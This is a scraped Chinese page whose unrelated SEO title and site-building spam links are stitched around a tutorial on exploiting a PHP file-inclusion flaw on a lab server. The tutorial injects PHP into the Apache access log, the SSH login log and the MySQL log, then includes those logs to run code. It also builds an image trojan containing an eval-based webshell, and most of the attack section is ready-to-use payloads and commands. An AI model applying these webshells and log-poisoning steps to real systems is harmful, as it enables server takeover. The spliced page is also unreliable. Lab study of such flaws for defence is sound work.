当前位置: 首页 > news >正文

免费发布的网站seo优化服务是什么

news 2025/11/2 6:12:04
免费发布的网站,seo优化服务是什么,建设银行官网登录,深圳今天最新通知日志利用, 图片木马利用 一, 利用服务器日志 通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段. apache log: /opt/lampp/logs/access_log nginx log: /usr/local/nginx/logs/access.log 首先可以利用文件包含漏洞测试日志文件的内容是否可以显…

日志利用, 图片木马利用

一, 利用服务器日志

通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段.

apache log: /opt/lampp/logs/access_log
nginx log: /usr/local/nginx/logs/access.log

首先可以利用文件包含漏洞测试日志文件的内容是否可以显示.
实际情况下日志的路径和名称都可能被修改, 需要其他手段获取.

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/access_log
http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/error_log

由于日志会记录请求的url, 如果发送的url中带有恶意代码, 那么日志文件access_log就会记录, 再使用文件包含漏洞包含日志文件来执行代码.

http://192.168.112.200/security/fileinc.php<?php phpinfo(); ?>

查看access_log日志:

[25/Oct/2023:09:57:53 +0800] "GET /security/fileinc.php%3C?php%20phpinfo();%20?%3E HTTP/1.1"

这里可以看到符号被浏览器转码了, 因此无法执行代码.
那么我们绕过浏览器来发送这个请求, 例如使用 burpsuite.

方式1: 不使用双引号, 需要去掉php空格.
GET /security/fileinc.php<?phpinfo();?> HTTP/1.1

查看access_log日志:

[25/Oct/2023:10:26:31 +0800] "GET /security/fileinc.php<?phpinfo();?> HTTP/1.1" 404 1033

这里看到代码已经顺利写入了, 那么利用文件包含来执行代码:

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/access_log
方式2: 使用双引号, 好处是可以包含更复杂的代码.
GET /security/fileinc.php"<?php eval($_POST['cmd']);?>" HTTP/1.1

查看access_log日志:

[25/Oct/2023:10:44:15 +0800] "GET /security/fileinc.php\"<?php eval($_POST['cmd']);?>\"" 400 961

利用漏洞:

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/access_logpost data: 
cmd=phpinfo();

二, 利用ssh或mysql的登录日志

1. linux默认的登录日志:
/var/log/secure

日志文件对其他用户有可读权限

正常登录:

ssh root@192.168.112.200

因为ssh的登录日志中会记录发送的用户名, 那么将用户名替换成恶意代码来登录:

ssh "<?phpinfo();?>"@192.168.112.200

查看日志:

Oct 25 11:15:13 mycentos sshd[16208]: Invalid user <?phpinfo();?> from 192.168.112.1 port 14605
Oct 25 11:15:13 mycentos sshd[16208]: input_userauth_request: invalid user <?phpinfo();?> [preauth]

这里可以看到代码已经注入到日志中了, 接下来利用文件包含漏洞执行代码:

http://192.168.112.200/security/fileinc.php?filename=/var/log/secure
2. mysql的登录日志

原理与ssh日志利用一样.

mysql日志默认是关闭的. 需要mysql日志是开启状态 /opt/lampp/etc/my.cnf:

general_log=ON
general_log_file=/opt/lampp/logs/mysql.log
log_output=file

日志文件对其他用户有可读权限

假设日志的路径:

/opt/lampp/logs/mysql.log

正常登录:

mysql -u root -p -h 192.168.112.200

将用户名替换成恶意代码:

mysql -u "<?phpinfo();?>" -p -h 192.168.112.200

利用文件包含漏洞执行代码:

http://192.168.112.200/security/fileinc.php?filename=/opt/lampp/logs/mysql.log

3. 图片木马

准备图片和php文件, 使用cmd中的copy命令合并.

例如:
mm.php文件:

<?php @eval($_GET['cmd']); ?>

命令:

copy src.jpg/b + mm.php/a p_mm.jpg

以上命令将src.jpgmm.php合并, 生成图片p_mm.jpg

将木马图片上传到服务器, 利用文件包含漏洞执行代码:

http://192.168.112.200/security/fileinc.php?filename=image/p_mm.jpg&cmd=phpinfo();
http://www.yayakq.cn/news/131548/

相关文章:

  • 网站后台如何修改文字研磨材料 东莞网站建设
  • 主题公园旅游景区网站建设注册网站域名
  • 在线网站编辑重庆知名网站制作公司
  • 东莞seo优化方案网站性能优化方法
  • 做的好的微信商城网站seo云优化下载
  • 南京网站开发南京乐识赞北京黑马计算机培训机构
  • 南通网站建设系统方案百度投诉电话人工服务总部
  • 学校网站建设的好处站长网站大全
  • 外贸网站设计案例网站最下端怎么做
  • 网站管理建设落实报告网站底部浮动电话广告
  • 计算机专业哪个专业比较好就业深圳seo云哥
  • 陕西做网站网站建设的整体设计流程
  • 大安市建设局网站丽水建设局网站
  • 舆情分析网站驻马店app和网站开发公司
  • 化州网站建设网站开发小图标
  • 做网站每一步的是什么如何将网站变成免费
  • 昆明网站建设frfwordpress shortcode土豆 视频
  • 设计公司 网站系统中没有安装wordpress
  • 制作网站软件哪个好网站中常用的英文字体
  • 营销型网站有哪些类互联网网站建设
  • 手机网站建设哪家强跨境网站有哪些平台
  • 四川省住房与城乡建设 厅网站做的网站怎么打开是白板
  • 佛山网站搜索排名青海商会网站建设公司
  • 公共交通公司网站建设方案网络营销推广方案论文
  • 广州番禺建设银行网站登录seo做的比较好的网站
  • 房产网站建设什么类型ppt制作手机版
  • 淄博建网站多少钱wordpress 搜索 自定义字段
  • wordpress如何搬站wordpress投递文章插件
  • 井冈山网站建设俄语在线网站建设
  • 网站反链接是什么意思摄影师做展示的网站